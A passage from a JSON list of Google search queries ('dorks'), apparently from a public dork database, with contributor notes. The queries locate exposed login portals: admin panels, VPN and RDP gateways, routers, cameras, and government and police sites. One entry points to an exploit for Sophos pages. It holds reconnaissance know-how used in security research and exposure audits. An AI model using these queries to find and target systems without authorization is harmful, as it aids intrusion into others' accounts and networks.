Login\"", "description": "# Dork:intitle:\"Intranet Login\"\r\n# Lists Intranet Portals\r\n# Author : Ambadi MP"}, {"dork": "Pages Containing Login Portal into Various Web Server", "description": "#* Google Dork: inurl:\"/index.php?route=account/password\"*\r\n*# Date: 07/06/2020*\r\n*# List of Employee login page of various website*\r\n\r\n\r\n*# Author: Arindam Halder*\r\n*# LinkedIn: www.linkedin.com/in/arindam-halder-0798\r\n*\r\n\r\n*Best Regards,*\r\n*Arindam Halder*"}, {"dork": "intitle:.*edu/login", "description": "Dork: intitle:.*edu/login\r\nDescription: This google dorks lists out edu website login portals.\r\nAuthor: Abhi Chitkara"}, {"dork": "intitle:\"*Admin Intranet Login\"", "description": "# Google Dork: intitle:\"*Admin Intranet Login\"\r\n\r\n# Just a few admin intranet login pages.\r\n\r\n# Date: 2020-06-09\r\n\r\n# Exploit Author: Alexandros Pappas"}, {"dork": "inurl:.*org/login", "description": "#* Google Dork: inurl:.*org/login\r\n\r\n*# google dork to list login portal in .org domain*\r\n\r\n\r\n*# Author: Shankar bhuvanesh\r\nhttps://www.linkedin.com/in/bhuvaneshshankar/"}, {"dork": "intitle:\"index of\" pass.php", "description": "Dork: intitle:\"index of\" pass.php\r\nAuthor: Hemant Patidar (HemantSolo)\r\nLinkedin: https://www.linkedin.com/in/hemantsolo/\r\n-- \r\n\r\nEthical Hacker | Founder and CEO at Solo Securities,\r\n\r\nCyber Security Analyst at Ismile Technologies\r\n\r\nPursuing B.Tech Civil Engineering from SRM University"}, {"dork": "inurl:\".Admin;-aspx }\" \"~Login\"", "description": "Google Dork : inurl:\".Admin;-aspx }\" \"~Login\"\r\n\r\n\r\nAuthor : ANJALI PRAKASH"}, {"dork": "\"login\" intitle:\"intext:\"Welcome to Member\" login\"", "description": "# Google Dork: \"login\" intitle:\"intext:\"Welcome to Member\" login\"\r\n# Various member login pages.\r\n# Date: 10/06/2020\r\n# Exploit Author: Alexandros Pappas"}, {"dork": "index of \"jira\" inurl:login", "description": "Dork: index of \"jira\" inurl:login\r\nDate: 2020-06-14\r\nRegards,\r\nNikhil Kumar"}, {"dork": "inurl:adminlogin.jsp", "description": "#Google Dork:- inurl:adminlogin.jsp\r\n\r\n#Description: This Page Contains Various Admin login Pages for a web server.\r\n\r\n#Author: Md Anzaruddin\r\nLinkedin: https://www.linkedin.com/in/mdanzaruddin/\r\n\r\n\r\n#Date: 15-June-2020\r\n\r\n---\r\n\r\nRegards:\r\nMd Anzaruddin"}, {"dork": "intext:\"index of /\" \"customer.php\" \"~Login\"", "description": "Dork: intext:\"index of /\" \"customer.php\" \"~Login\"\r\nDescription: will give information related to customer and login info.\r\nAuthor: Priyanka Prasad"}, {"dork": "intext:\"Welcome to Intranet\" \"login\"", "description": "# Google Dork: intext:\"Welcome to Intranet\" \"login\"\r\n# Intranet login pages.\r\n# Date: 2020-06-10\r\n# Exploit Author: Alexandros Pappas"}, {"dork": "inurl:\"index.php/user/password/\" intext:Password Reset", "description": "Dork: inurl:\"index.php/user/password/\" intext:Password Reset\r\n\r\n*Ritesh Gohil*\r\n*Security Researcher*\r\n*Linkedin: *https://www.linkedin.com/in/riteshgohil25/"}, {"dork": "inurl:candidatelogin.aspx", "description": "Google Dork : inurl:candidatelogin.aspx\r\nDescription: Used to find candidate login page of different company website\r\n\r\n\r\n-- \r\nWith Regards,\r\nAkhil G Krishnan"}, {"dork": "site:vpn.*.*/ intext:\"login\" intitle:\"login\"", "description": "# Google Dork: site:vpn.*.*/ intext:\"login\" intitle:\"login\"\r\n# Various VPN login pages.\r\n# Date: 29/06/2020\r\n# Exploit Author: Alexandros Pappas"}, {"dork": "inurl:\"index.php/user/password/\"", "description": "inurl:\"index.php/user/password/\""}, {"dork": "allinurl:tsweb/default.htm", "description": "# Google Dork: allinurl:tsweb/default.htm\r\n# Juicy information and sensitive directories regarding Remote Desktop Web\r\n# Connection\r\n# Date: 29/06/2020\r\n# Exploit Author: Alexandros Pappas"}, {"dork": "inurl:\"backend/web/site/login\"", "description": "# Dork : inurl:\"backend/web/site/login\"\r\n# Backend Login Portals\r\n# Author : Ambadi MP"}, {"dork": "inurl:passwordvault intext:cyberark", "description": "# Google Dork: inurl:passwordvault intext:cyberark\r\n# Description: discover publicly available CyberArk\u2019s PVWA portal\r\n# Author: Juan Christian (https://www.linkedin.com/in/juanchristian)"}, {"dork": "inurl:8080/login.php", "description": "Dork: inurl:8080/login.php\r\nAuthor: Priyanka Prasad"}, {"dork": "site:gov.*.*/ intext:\"login\" intitle:\"login\"", "description": "Description: *site:gov.*.*/ intext:\"login\" intitle:\"login\"*\r\n*Various government website login pages.*"}, {"dork": "inurl:/8080/admin.html", "description": "# Google Dork: inurl:/8080/admin.html\r\n# By using this dork, various web cameras can be revealed.\r\n# Date: 2/07/2020\r\n# Author: Alexandros Pappas"}, {"dork": "\"login\" intitle:\"*reports login\"", "description": "# Google Dork : \"login\" intitle:\"*reports login\"\r\n# Description : Various Report login portals.\r\n# Date: 07/07/2020\r\n# Author: Jose Praveen"}, {"dork": "\"TOPdesk ApplicationServer\" inurl:/index.jsp", "description": "# Google Dork: \"TOPdesk ApplicationServer\" inurl:/index.jsp\r\n# Pages containing login portals.\r\n# Date: 8/07/2020\r\n# Author: Alexandros Pappas"}, {"dork": "\"big-ip logout page\" ext:php3", "description": "Dork: \"big-ip logout page\" ext:php3"}, {"dork": "inurl:/opac/index.jsp", "description": "# Google Dork : inurl:/opac/index.jsp\r\n# Description : Pages containing login portals.\r\n# Date: 09/07/2020\r\n# Author: Jose Praveen"}, {"dork": "inurl:client_password=", "description": "Google Dork: inurl:client_password=\r\nExploit Title: various pages containing password reset &\r\nreminder portals and login portals.\r\nDate: 10/07/2020\r\nExploit Author: Sanu Jose M"}, {"dork": "\"login\" intitle:\"*payroll login\"", "description": "# Google Dork: \"login\" intitle:\"*payroll login\"\r\n# Payroll login portals.\r\n# Date: 14/07/2020\r\n# Author: Alexandros Pappas"}, {"dork": "inurl:/seeyon/index.jsp", "description": "# Google Dork : inurl:/seeyon/index.jsp\r\n# Description : Pages containing login portals.\r\n# Date: 11/07/2020\r\n# Author: Jose Praveen"}, {"dork": "inurl:index.php \"Powered by PHP Server Monitor v3.1.1\"", "description": "# Google Dork: inurl:index.php \"Powered by PHP Server Monitor v3.1.1\"\r\n# Pages containing login portals.\r\n# Date: 20/07/2020\r\n# Exploit Author: Alexandros Pappas"}, {"dork": "inurl:/+CSCOE+/logon.html?", "description": "# Exploit Title: inurl:/+CSCOE+/logon.html?\r\n# Google Dork: inurl:/+CSCOE+/logon.html?\r\n# Date: 24/07/2020\r\n#Dork: CISCO WebVPN Logins\r\n# Author: Supun Halangoda"}, {"dork": "site:com \"sap netweaver portal\"", "description": "Google Dork: site:com \"sap netweaver portal\"\r\nAuthor: Berat ISLER (root1x)\r\n\r\nBest Regards.\r\n\r\nBerat ISLER (root1x)"}, {"dork": "inurl:/webconsole/webpages/login.jsp", "description": "# Google Dork: inurl:/webconsole/webpages/login.jsp\r\n# Various Sophos Login page. Attacker may use https://www.exploit-db.com/exploits/48683 to exploit those pages\r\n# Date: 23/07/2020\r\n# Exploit Author: *Dharmveer Singh*\r\n\r\n[image: image.png]\r\n\r\n\r\n\r\n\r\n[image: image.png]"}, {"dork": "intitle:\"SFXAdmin\" intext:\"Login Form\"", "description": "# Google Dork: intitle:\"SFXAdmin\" intext:\"Login Form\"\r\n# Various pages containing login portals.\r\n# Date: 3/07/2020\r\n# Exploit Author: Alexandros Pappas"}, {"dork": "site:police.*.*/ intext:\"login\" intitle:\"login\"", "description": "# Google Dork: site:police.*.*/ intext:\"login\" intitle:\"login\"\r\n# By using this dork, we can extract various police station login portals\r\n# Date: 3/07/2020\r\n# Author: Dharmveer Singh*\r\n\r\n[image: image.png]"}, {"dork": "site:admin.*.*/ intext:\"login\" intitle:\"login\"", "description": "# Google Dork: site:admin.*.*/ intext:\"login\" intitle:\"login\"\r\n# Various admin login pages.\r\n# Date: 2/07/2020\r\n# Exploit Author: Alexandros Pappas"}, {"dork": "\"You have accessed a private computer system\" inurl:login", "description": "# Google Dork: \"You have accessed a private computer system\" inurl:login\r\n\r\n# Pages containing login portals.\r\n\r\n# Date: 29/07/2020\r\n\r\n# Exploit Author: Alexandros Pappas"}, {"dork": "intitle:\"Remote Desktop Web Connection\" inurl:tsweb", "description": "Description: intitle:\"Remote Desktop Web Connection\" inurl:tsweb\r\n\r\nThis dork gives RDP login portals."}, {"dork": "intitle:\"Login - OpenStack Dashboard\" inurl:/dashboard/auth/login", "description": "Google Dork: intitle:\"Login - OpenStack Dashboard\"\r\ninurl:/dashboard/auth/login\r\n\r\nDescription: This dork lists all the login portals to OpenStack Dashboard.\r\n\r\nAuthor: Sibi Mathew George"}, {"dork": "intitle:\"OpenWrt - LuCI\" \"Authorization Required\"", "description": "# Google Dork: intitle:\"OpenWrt - LuCI\" \"Authorization Required\"\r\n# Pages containing login portals.\r\n# Date: 06/08/2020\r\n# Exploit Author: Alexandros Pappas"}, {"dork": "site:.gov inurl:admin login", "description": "Description- site:.gov inurl:admin login\r\nThis dork gives Admin login panels of many websites."}, {"dork": "intitle:\"NETGEAR\" inurl:\"/base/main_login.html\"", "description": "# Google Dork: intitle:\"NETGEAR\" inurl:\"/base/main_login.html\"\r\n# NETGEAR router login portals.\r\n# Date: 11/08/2020\r\n# Exploit Author: Alexandros Pappas"}, {"dork": "inurl:client_login=", "description": "Exploit Title: Pages containing login portals.\r\n Google Dork: inurl:client_login=\r\n Date: 10/08/2020\r\n Exploit Author: Sanu Jose M\r\n Thanks & regards,\r\n SANU JOSE M"}, {"dork": "intitle:\"D-LINK SYSTEMS, INC. | WIRELESS AP : LOGIN\"", "description": "# Google Dork: intitle:\"D-LINK SYSTEMS, INC. | WIRELESS AP : LOGIN\"\r\n# D-LINK Wireless AP login portals.\r\n# Date: 11/08/2020\r\n# Exploit Author: Alexandros Pappas"}, {"dork": "intitle:\"DVR LOGIN\" -com", "description": "Google Dork: intitle:\"DVR LOGIN\" -com\r\n\r\nDescription: This google dork is useful for detecting all the login portals of DVR based devices.\r\n\r\nAuthor: Sibi Mathew George\r\n\r\n\r\n\r\n\r\n\r\n----\r\nSent using Guerrillamail.com\r\nBlock or report abuse: https://www.guerrillamail.com//abuse/?a=RU5mDh4gTLITmwu3vn0Qfw%3D%3D"}, {"dork": "intitle:\"Helpdesk Software Login\" \"login\" \"by Jitbit\"", "description": "# Google Dork: intitle:\"Helpdesk Software Login\" \"login\" \"by Jitbit\"\r\n# Ticketing Systems login portals.\r\n# Date: 12/08/2020\r\n# Exploit Author: Alexandros Pappas"}, {"dork": "allintitle:\"MDVR Login\"", "description": "Google Dork: allintitle:\"MDVR Login\"\r\n\r\nDescription: This google dork is useful for detecting all the login portals\r\nof MDVR based devices.\r\n\r\nAuthor: Sibi Mathew George"}, {"dork": "intitle:\"D-LINK\" inurl:Login.html", "description": "# Google Dork: intitle:\"D-LINK\" inurl:Login.html\r\n# D-LINK router login portals.\r\n# Date: 11/08/2020\r\n# Exploit Author: Alexandros Pappas"}, {"dork": "intitle:\"axigen webadmin\"", "description": "# Dork: intitle:\"axigen webadmin\"\r\n# Author: Edwyn Sanders\r\n# Date: 16-08-2020\r\n# Description: shows all businesses that use axigen WebAdmin using the web\r\nbrowser\r\n\r\n\r\n\r\nMgter Edwyn Roberto Sanders Rivera\r\nGerente Propietario\r\nEdificaWeb\r\n*E-MAIL:* esanders@edificaweb.com\r\n*Website:* www.edificaweb.com"}, {"dork": "inurl:\"/login?csrfkey=\" intitle:\"cisco email security\"", "description": "# Google Dork: inurl:\"/login?csrfkey=\" intitle:\"cisco email security\"\r\n# CISCO Email Security Appliance login portals.\r\n# Date: 18/08/2020\r\n# Exploit Author: Adithya Chandra\r\n\r\nThanks and Best Regards,\r\nAdithya Chandra"}, {"dork": "site:*/piwik \"Sign in\" \"Matomo\"", "description": "# Google Dork: site:*/piwik \"Sign in\" \"Matomo\"\r\n# Matomo login portals.\r\n# Date: 12/08/2020\r\n# Exploit Author: Alexandros Pappas"}, {"dork": "intitle:\"NVR LOGIN\" -inurl:\"nvr | com | www | net\"", "description": "Google Dork: intitle:\"NVR LOGIN\" -inurl:\"nvr | com | www | net\"\r\nDescription: This google dork is useful for detecting all the login portals\r\nof NVR based devices.\r\nAuthor: Sibi Mathew George"}, {"dork": "inurl:\"/rpAuth.html\" \"ZyWALL\"", "description": "# Google Dork: inurl:\"/rpAuth.html\" \"ZyWALL\"\r\n# ZyWALL Series Firewall login portals.\r\n# Date: 24/08/2020\r\n# Exploit Author: Alexandros Pappas"}, {"dork": "inurl:device.rsp -com -www", "description": "Google Dork: inurl:device.rsp -com -www\r\n\r\nDescription: This Google Dork is helpful in finding all the login portals\r\nof devices such as XVR, NVR, HVR, DVR, MDVR, AHD, HD IP Camera etc.\r\n\r\nAuthor: Sibi Mathew George"}, {"dork": "inurl:/login.asp \"Configuration and Management\"", "description": "# Google Dork: inurl:/login.asp \"Configuration and Management\"\r\n# Configuration and Management login portals.\r\n# Date: 20/08/2020\r\n# Exploit Author: Alexandros Pappas"}, {"dork": "\"Citrix Receiver\" inurl:index.html \"Gateway\"", "description": "# Google Dork: \"Citrix Receiver\" inurl:index.html \"Gateway\"\r\n# Citrix Gateway login portals.\r\n# Date: 26/08/2020\r\n# Exploit Author: Alexandros Pappas"}, {"dork": "inurl:\"/portal/webclient\" intitle:\"VMware Horizon\"", "description": "# Google Dork: inurl:\"/portal/webclient\" intitle:\"VMware Horizon\"\r\n# Description: This dork will list out all the VMware Horizon login portals.\r\n# Date: 25/08/2020\r\n# Exploit Author: Varsha V Rajan\r\n\r\nThanks & Regards,\r\n\r\nVarsha V Rajan"}, {"dork": "inurl:login_up.php \"Plesk Onyx\"", "description": "# Google Dork: inurl:login_up.php \"Plesk Onyx\"\r\n# Plesk Onyx login portals.\r\n# Date: 26/08/2020\r\n# Exploit Author: Alexandros Pappas"}, {"dork": "intitle:\"Wimax CPE Configuration\"", "description": "# Google Dork: intitle:\"Wimax CPE Configuration\"\r\n# Wimax CPE Configuration portals.\r\n# Date: 30/08/2020\r\n# Exploit Author: Alexandros Pappas"}, {"dork": "intitle:\"GoAnywhere Web Client - Login\"", "description": "# Google Dork: intitle:\"GoAnywhere Web Client - Login\"\r\n# Login portals.\r\n# Date: 29/08/2020\r\n# Exploit Author: Alexandros Pappas"}, {"dork": "allintitle:\"Welcome admin\"", "description": "allintitle:\"Welcome admin\"\r\n\r\nDork shows admin pages of various sites"}, {"dork": "intitle:\"login to webmin\" \"You must enter a username and password to login to the Webmin server\"", "description": "intitle:\"login to webmin\" \"You must enter a username and password to login to the Webmin server\"\r\n\r\nBR,\r\nReza Abasi(Turku)"}, {"dork": "intitle:\"Web Login\" \"For security reasons only authorized users are allowed access to this web server. \"", "description": "# Google Dork: intitle:\"Web Login\" \"For security reasons only authorized\r\nusers are allowed access to this web server. \"\r\n\r\n# Login portals.\r\n\r\n# Date: 2/09/2020\r\n\r\n# Exploit Author: Alexandros Pappas"}, {"dork": "inurl:weblogin.cgi?mobile=0", "description": "# Google Dork: inurl:weblogin.cgi?mobile=0\r\n# ZyXEL (Unified Security Gateways, Firewalls, VPN, etc) login portals.\r\n# Date: 1/09/2020\r\n# Exploit Author: Alexandros Pappas"}, {"dork": "inurl: authorlogin.php", "description": "#Exploit Title: Pages containing login portals.\r\n #Google Dork: inurl: authorlogin.php\r\n #Date: 07/09/2020\r\n #Exploit Author: Sanu Jose M\r\n\r\n Thanks & regards,\r\n SANU JOSE M"}, {"dork": "\"SonicWALL - Authentication\" inurl:/auth.html", "description": "# Google Dork: \"SonicWALL - Authentication\" inurl:/auth.html\r\n# Pages containing login portals.\r\n# Date: 3/09/2020\r\n# Exploit Author: Alexandros Pappas"}, {"dork": "inurl:/userportal/webpages/myaccount/login.jsp", "description": "Dorks:\r\ninurl:/userportal/webpages/myaccount/login.jsp\r\n\r\nSummary:\r\nA Google dork that gives login page for the Sophos XG firewall\r\n\r\n-- \r\nThanks & Regards,\r\nPrasad Lingamaiah"}, {"dork": "\"Retrieve Your Password\" site:*/recoverpassword.aspx", "description": "# Google Dork: \"Retrieve Your Password\" site:*/recoverpassword.aspx\r\n# Login portals (password recovery).\r\n# Date: 22/08/2020\r\n# Exploit Author: Alexandros Pappas"}, {"dork": "intitle:\"Dell SonicWALL - Authentication\" inurl:auth.html", "description": "Google Dork: intitle:\"Dell SonicWALL - Authentication\" inurl:auth.html\r\n\r\nDescription: This Google Dork is used for detecting/fetching login pages of\r\nDell based SonicWALL firewall devices.\r\n\r\nAuthor: Sibi Mathew George"}, {"dork": "site:ftp.*.* \"CrushFTP WebInterface\"", "description": "# Google Dork: site:ftp.*.* \"CrushFTP WebInterface\"\r\n# Pages containing login portals.\r\n# Date: 10/09/2020\r\n# Exploit Author: Alexandros Pappas"}, {"dork": "inurl:webclient/Login.xhtml", "description": "# Google Dork: inurl:webclient/Login.xhtml\r\n# Login portals (Powered by GoAnywhere).\r\n# Date: 10/09/2020\r\n# Exploit Author: Alexandros Pappas"}, {"dork": "inurl:\"/mifs/user\"", "description": "Google dork description: Mobileiron MDM Login Portals\r\nGoogle Search: inurl:\"/mifs/user\"\r\nSubmitted by: Alfie\r\nTwitter: https://twitter.com/emenalf\r\n\r\n\r\n-- \r\nRegards,\r\nAlfie.\r\nthe-infosec.com"}, {"dork": "inurl:/ mis login", "description": "# Google Dork: inurl:/ mis login\r\n # Date: [15/09/2020]\r\n # Exploit Author: [Raghotham M]\r\n # Category: [Pages Containing Login Portals]\r\n # Description: [ Dork shows admin pages of various sites and Management\r\nInformation System login portals ]"}, {"dork": "site:jira.*.* inurl:/customer/portal/", "description": "# Google Dork: site:jira.*.* inurl:/customer/portal/\r\n# Jira login portals.\r\n# Date: 16/09/2020\r\n# Exploit Author: Alexandros Pappas"}, {"dork": "inurl:/ ims login", "description": "# Google Dork: inurl:/ ims login\r\n# Description :- Dork shows admin pages of various sites and Information\r\n# Managenment System login portals\r\n# Date: 21/09/2020\r\n# Author: Sahil Saxena\r\n# LinkedIn: https://www.linkedin.com/in/sahil-saxena-1333b9174\r\n\r\nThanks,\r\nSahil Saxena"}, {"dork": "inurl:\"rms login\"", "description": "# Google Dork: inurl:\"rms login\"\r\n# Author: Abida Shariff\r\n# Category: Pages Containing Login Portals\r\n# Description:\r\nVarious login portals of resource management system sites"}, {"dork": "inurl:\"sms login\"", "description": "#Exploit Title : Dork shows login pages of various sites.\r\n#Google Dork : inurl:\"sms login\"\r\n#Date : 22/09/2020\r\n#Exploit Author : Sanu Jose M\r\n\r\nThanks & Regards,\r\n\r\nSanu Jose M"}, {"dork": "inurl:\"plc login\"", "description": "# Google Dork: inurl:\"plc login\"\r\n# Author: Muralikrishna Janga\r\n# Category: Pages Containing Login Portals\r\n# Description: Various login portals of Public Limited Companies"}, {"dork": "inurl:VirtualEms/Login.aspx", "description": "# Google Dork: inurl:VirtualEms/Login.aspx\r\n# Pages containing login portals.\r\n# Date: 23/09/2020\r\n# Exploit Author: Alexandros Pappas"}, {"dork": "inurl:/ lms login", "description": "# Google Dork: inurl:/ lms login\r\n # Date: 22/09/2020\r\n # Author: Raghotham M\r\n # Category: Pages Containing Login Portals\r\n # Description: Dork shows Learning management system portals and admin\r\npages of various sites"}, {"dork": "inurl:idp/SSO.saml2", "description": "# Google Dork: inurl:idp/SSO.saml2\r\n# Date: 9/25/2020\r\n# Exploit Author: Javier Bernardo\r\n# Homepage: https://www.hack.com.ar\r\n\r\nJavier Bernardo\r\n*Ethical Hacker | Information Security Engineer*\r\n\r\n\r\n\r\nBuenos Aires - Argentina"}, {"dork": "inurl:/ Kms login", "description": "#Exploit Title : Dork shows knowledge management system portals and login\r\n# pages of various sites.\r\n\r\n#Google Dork :inurl:/ Kms login\r\n\r\n#Date : 24/09/2020\r\n\r\n#Exploit Author : Sanu Jose M\r\n\r\nThanks & Regards,\r\n\r\nSanu Jose M"}, {"dork": "inurl:AIMS/PS", "description": "# Google Dork: inurl:AIMS/PS\r\n# Date: 9/28/2020\r\n# Exploit Author: Javier Bernardo\r\n\r\nJavier Bernardo\r\n*Ethical Hacker | Information Security Engineer*\r\n\r\n\r\nBuenos Aires - Argentina"}, {"dork": "inurl:/ usda login", "description": "# Google Dork: inurl:/ usda login\r\n# Description :- Dork shows sensitive login portals\r\n# Date: 25/09/2020\r\n# Author: Sahil Saxena\r\n# LinkedIn: https://www.linkedin.com/in/sahil-saxena-1333b9174\r\n# Twitter: https://twitter.com/Sahil_delinitor\r\n# GitHub: https://github.com/Sahil-69\r\n# Bugcrowd: https://bugcrowd.com/Prickn\r\n\r\nThanks,\r\nSahil Saxena"}, {"dork": "inurl:/ emis login", "description": "# Google Dork: inurl:/ emis login\r\n # Date: 25/09/2020\r\n # Author: Raghotham Mruthike\r\n # Category: Pages Containing Login Portals\r\n # Description: Dork shows admin pages of various sites."}, {"dork": "inurl:console-selfservice", "description": "# Google Dork: inurl:console-selfservice# Date: 9/10/2020\r\n# Exploit Author: Javier Bernardo\r\n# RSA Login pages\r\n\r\nJavier Bernardo\r\n*Ethical Hacker | Information Security Engineer*\r\n\r\nBuenos Aires - Argentina"}, {"dork": "inurl:/phpPgAdmin/browser.php intext:\"Servers\" | \"PostgreSQL*\"", "description": "# Google Dork: inurl:/phpPgAdmin/browser.php intext:\"Servers\" |\"PostgreSQL*\"\r\n# phpPgAdmin portals.\r\n# Date: 30/09/2020\r\n# Exploit Author: Alexandros Pappas"}, {"dork": "allintitle:\"CrushFTP WebInterface\"", "description": "Google Dork: allintitle:\"CrushFTP WebInterface\"\r\n\r\nDescription: This Google Dork helps in detecting various pages of CrushFTP\r\nWebInterface which includes login portals as well password reset/recovery\r\npages.\r\n\r\nAuthor: Sibi Mathew George"}, {"dork": "intext:piwik \"login\"", "description": "#Exploit Title : PIWIK login pages.\r\n\r\n#Google Dork : intext:piwik \"login\"\r\n\r\n#Date : 12/10/2020\r\n\r\n#Exploit Author : Sanu Jose M\r\n\r\nThanks & Regards,\r\n\r\nSanu Jose M"}, {"dork": "inurl:weblogin.cgi?=1", "description": "#Exploit Title : Displays login portals.\r\n\r\n#Google Dork : inurl:weblogin.cgi?=1\r\n\r\n#Date : 10/10/2020\r\n\r\n#Exploit Author : Sanu Jose M\r\n\r\nThanks & Regards,\r\n\r\nSanu Jose M"}, {"dork": "\"Vigor Login Page\" + intext:\"Group\"", "description": "# Google Dork: \"Vigor Login Page\" + intext:\"Group\"\r\n\r\n# Vigor router login portals.\r\n\r\n# Date: 14/10/2020\r\n\r\n# Exploit Author: Alexandros Pappas"}, {"dork": "intitle:\"InfoView\" + \"Log On to InfoView\"", "description": "# Google Dork: intitle:\"InfoView\" + \"Log On to InfoView\"\r\n\r\n# Pages containing login portals.\r\n\r\n# Date: 15/10/2020\r\n\r\n# Exploit Author: Alexandros Pappas"}, {"dork": "intext:Please Login SSL VPN inurl:remote/login intext:FortiClient", "description": "#Google Dork: intext:Please Login SSL VPN inurl:remote/login\r\n#intext:FortiClient\r\n#Description : Fortinet VPN login pages.\r\n#Date : 19/10/2020\r\n#Exploit Author: Aninda Saha\r\n\r\nProof Of Concept:"}, {"dork": "intitle:\"SiteOmat Loader\"", "description": "# Exploit Title: Orpak SiteOmat login portals\r\n\r\n# Google Dork: intitle:\"SiteOmat Loader\"\r\n# Author: Kitchaphan Singchai (idealphase)"}, {"dork": "intitle:\"pi-hole Admin console\" intext:\"login\"", "description": "#Google Dork: intitle:\"pi-hole Admin console\" intext:\"login\"\r\n#Description : Various pages containing pi hole login portals.\r\n#Date : 19/10/2020\r\n#Exploit Author: Aninda Saha"}, {"dork": "inurl:weblogin.cgi?=0", "description": "#Exploit Title : Displays login portals.\r\n\r\n#Google Dork : inurl:weblogin.cgi?=0\r\n\r\n#Date : 10/10/2020\r\n\r\n#Exploit Author : Sanu Jose M\r\n\r\nThanks & Regards,\r\n\r\nSanu Jose M\r\nReplyForward"}, {"dork": "site:sftp.*.*/ intext:\"login\" intitle:\"server login\"", "description": "# Google Dork: site:sftp.*.*/ intext:\"login\" intitle:\"server login\"\r\n\r\n# Pages containing login portals.\r\n\r\n# Date: 24/10/2020\r\n\r\n# Exploit Author: Alexandros Pappas"}, {"dork": "allintext:\"Copperfasten Technologies\" \"Login\"", "description": "# Title: Find websites using SpamTitan system\r\n# Google Dork: allintext:\"Copperfasten Technologies\" \"Login\"\r\n# Author: KawaiiPantsu"}, {"dork": "inurl:/adfs/ls/?SAMLRequest", "description": "# Google Dork: inurl:/adfs/ls/?SAMLRequest\r\n# Date: 10/22/2020\r\n# Exploit Author: Javier Bernardo\r\n# Homepage: https://www.hack.com.ar\r\n\r\nJavier Bernardo\r\n*Ethical Hacker | Information Security Engineer*\r\nEmail: javierbernardo001@gmail.com | Website: hack.com.ar"}, {"dork": "inurl:/adfs/ls/idpinitiatedsignon", "description": "# Google Dork: inurl:/adfs/ls/idpinitiatedsignon\r\n# Date: 10/28/2020\r\n# Exploit Author: Javier Bernardo\r\n# Homepage: https://www.hack.com.ar\r\n\r\nJavier Bernardo\r\n*Ethical Hacker | Information Security Engineer*"}, {"dork": "inurl:/eftclient/account/login.htm", "description": "# Exploit Title: *inurl:/eftclient/account/login.htm*\r\n# Google Dork: *inurl:/eftclient/account/login.htm*\r\n# Enhanced File Transfer (EFT) Login portal. EFT from Globalscape is an advanced, powerful managed file transfer (MFT) solution.\r\n# Dork Author: Sajan Dhakate\r\n\r\n*Thanks & Regards*\r\n*Sajan Dhakate*"}, {"dork": "inurl:\"/?q=user/password/\"", "description": "inurl:\"/?q=user/password/\"\r\nPages containing login portal:\r\n\r\nBR,\r\nReza Abasi(Turku)\r\nIranian cyber sec researcher"}, {"dork": "inurl:/?op=register", "description": "#Exploit Title : Displays various Login and registration portals.\r\n#Google Dork :inurl:/?op=register\r\n#Date : 17/11/2020\r\n#Exploit Author : Sanu Jose M\r\n\r\nThanks & Regards,\r\n\r\nSanu Jose M"}, {"dork": "inurl:\"servicedesk/customer/user/login\"", "description": "# Google Dork: inurl:\"servicedesk/customer/user/login\"\r\n# Pages containing Login Portals (Service Desk Login Portals).\r\n# Date: 9/11/2020\r\n# Exploit Author: Alexandros Pappas"}, {"dork": "intitle:\"Xenmobile Console Logon\"", "description": "# Google Dork: intitle:\"Xenmobile Console Logon\"\r\n# Date: 11/17/2020\r\n# Exploit Author: Javier Bernardo\r\n# Homepage: https://www.hack.com.ar\r\n\r\nJavier Bernardo\r\n*Ethical Hacker | Information Security Engineer*\r\nEmail: javierbernardo001@gmail.com | Website: hack.com.ar\r\nBuenos Aires - Argentina"}, {"dork": "inurl:login.seam", "description": "# Google Dork: inurl:login.seam\r\n# Date: 11/10/2020\r\n# Exploit Author: Javier Bernardo\r\n# Homepage: https://www.hack.com.ar\r\n\r\nJavier Bernardo\r\n*Ethical Hacker | Information Security Engineer*\r\nBuenos Aires - Argentina"}, {"dork": "inurl:/adfs/oauth2/authorize", "description": "# Google Dork: inurl:/adfs/oauth2/authorize\r\n# Date: 10/29/2020\r\n# Exploit Author: Javier Bernardo\r\n# Homepage: https://www.hack.com.ar\r\n\r\nJavier Bernardo\r\n*Ethical Hacker | Information Security Engineer*\r\nBuenos Aires - Argentina"}, {"dork": "intitle:\"irz\" \"router\" intext:login gsm info -site:*.com -site:*.net", "description": "# Google Dork: intitle:\"irz\" \"router\" intext:login gsm info -site:*.com -site:*.net\r\n# Title: IRZ router login page\r\n# Date: 11/18/2020\r\n# Author: Diego Gonzalez (shell_wizard)\r\n\r\nHave a nice day ;)\r\nDiego Gonzalez"}, {"dork": "site:portal.*.* intitle:\"login\"", "description": "Pages containing login portal:\r\n\r\nsite:portal.*.* intitle:\"login\"\r\n\r\nBR,\r\nReza Abasi(Turku)\r\nIranian cyber sec researcher"}, {"dork": "intitle:\"Insurance Admin Login\" | \"(c) Copyright 2020 Cityline Websites. All Rights Reserved.\" | \"http://www.citylinewebsites.com\"", "description": "# Google Dork: intitle:\"Insurance Admin Login\" | \"\u00a9 Copyright 2020 Cityline\r\nWebsites. All Rights Reserved.\" | \"http://www.citylinewebsites.com\"\r\n# Admin Login Pages\r\n# Date: 23/11/2020\r\n# Exploit Author: Ayd\u0131n Baran Ertemir"}, {"dork": "site:user.*.* intitle:\"login\"", "description": "Pages containing login portal:\r\n\r\nsite:user.*.* intitle:\"login\"\r\n\r\nBR,\r\nReza Abasi(Turku)\r\nIranian cyber sec researcher"}, {"dork": "site:password.*.* intitle:\"login\"", "description": "Pages containing login portal:\r\n\r\nsite:password.*.* intitle:\"login\"\r\n\r\nBR,\r\nReza Abasi(Turku)\r\nIranian cyber sec researcher"}, {"dork": "site:checkin.*.* intitle:\"login\"", "description": "Pages containing login portal:\r\n\r\nsite:checkin.*.* intitle:\"login\"\r\n\r\nBR,\r\nReza Abasi(Turku)\r\nIranian cyber sec researcher"}, {"dork": "intitle:\"web client: login\"", "description": "#Exploit Title :Pages Containing Login portals.\r\n\r\n#Google Dork : intitle:\"web client: login\"\r\n\r\n#Date : 4/12/2020\r\n\r\n#Exploit Author : Sanu Jose M\r\n\r\nThanks & Regards,\r\n\r\nSanu Jose M"}, {"dork": "inurl:Sitefinity/Authenticate/SWT", "description": "# Google Dork: inurl:Sitefinity/Authenticate/SWT\r\n# Date: 12/1/2020\r\n# Exploit Author: Javier Bernardo\r\nPages Containing Login Portals\r\n\r\n\r\nJavier Bernardo\r\n*Ethical Hacker | Information Security Engineer*\r\nBuenos Aires - Argentina"}, {"dork": "inurl:idp/prp.wsf", "description": "# Google Dork: inurl:idp/prp.wsf\r\n# Date: 12/10/2020\r\n# Pages Containing Login Portals\r\n# Exploit Author: Javier 